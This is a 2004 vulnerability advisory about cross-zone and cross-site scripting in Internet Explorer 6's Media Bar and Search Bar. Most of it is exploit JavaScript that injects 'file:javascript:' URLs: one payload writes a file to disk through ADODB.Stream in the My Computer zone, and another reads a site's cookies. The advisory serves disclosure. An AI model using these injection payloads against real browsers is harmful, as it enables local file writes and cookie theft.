#########################################################################
Advisory Name : Internet Explorer Cross Zone/Site Scripting Vulnerability
Release Date : Mar 3,2004
Application : Microsoft Internet Explorer
Tested On : MS-IE 6.0(sp1)
Vendor URL : http://www.microsoft.com/ie
Author : Cheng Peng Su(apple_soup_at_msn.com)
#########################################################################
[Proof of Concept]
The code below is used for loading a URL into the HTML content area of the Media Bar
window.open("http://www.google.com/","_media")
And javascript also can be injected:
window.open("javascript:alert(location.href)","_media")
in my computer,the code above will show me a MsgBox says
'res://C:\WINDOWS\SYSTEM\BROWSELC.DLL/mbLoading.htm'
it suggests you that it's executed in My Computer Zone.
We can also inject a code to the Media Bar which has connected to a website.
As Media Bar ,Search Bar has the same vuln.
[Exploit]
!YOU CAN FIND THE DOCUMENT AT
!http://www.freewebs.com/applesoup/CrossBar/document.txt
The code will use 'file:javascript:[script]' vuln which posted months ago.Maybe Microsoft
has noticed the leak here,so i can't only use javascript-protocol in the code, and script-tag
is filtered out ,so i have to inject the script into img-tag.
I. In Media Bar
1 . Cross Zone Scripting Exploit
---------------------------CrossZone.htm---------------------------
<script>
// '\\42' -> '\42' -> ' " '
img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'
+ ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'
+ ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';
inject_html="![](" + img_src + ")
";
window.open('file:javascript:document.write("' + inject_html + '")','_media');
</script>
-------------------------------End---------------------------------
2 . Cross Site Scripting Exploit
---------------------------CrossSite.htm---------------------------
<script>
window.open("http://www.google.com/","_media")
setTimeout(function(){
window.open("file:javascript:alert(document.cookie);","_media")
},5000);
</script>
-------------------------------End---------------------------------
II. In Search Bar
1 . Cross Zone Scripting Exploit
---------------------------CrossZone.htm---------------------------
<script>
window.open("http://wrong_site_add/","_search") //To load "Friendly HTTP error messages" page
// cause it's in My Computer Zone.
setTimeout(function(){
// '\\42' -> '\42' -> ' " '
img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'
+ ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'
+ ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';
inject_html="";
window.open('file:javascript:document.write("' + inject_html + '")','_search');
},5000);
</script>
-------------------------------End---------------------------------
2 . Cross Site Scripting Exploit
---------------------------CrossSite.htm---------------------------
<script>
window.open("http://www.google.com/","_search")
setTimeout(function(){
window.open("file:javascript:alert(document.cookie);","_search")
},5000);
</script>
-------------------------------End---------------------------------
[Demo]
Harmless demo:
http://www.freewebs.com/applesoup/CrossBar/CrossSiteMB.htm
http://www.freewebs.com/applesoup/CrossBar/CrossZoneMB.htm
http://www.freewebs.com/applesoup/CrossBar/CrossSiteSB.htm
http://www.freewebs.com/applesoup/CrossBar/CrossZoneSB.htm
[Contact]
Cheng Peng Su
Class 1,Senior 2,high school attached to Wuhan University
Wuhan,Hubei,China(430072)
apple_soup_at_msn.com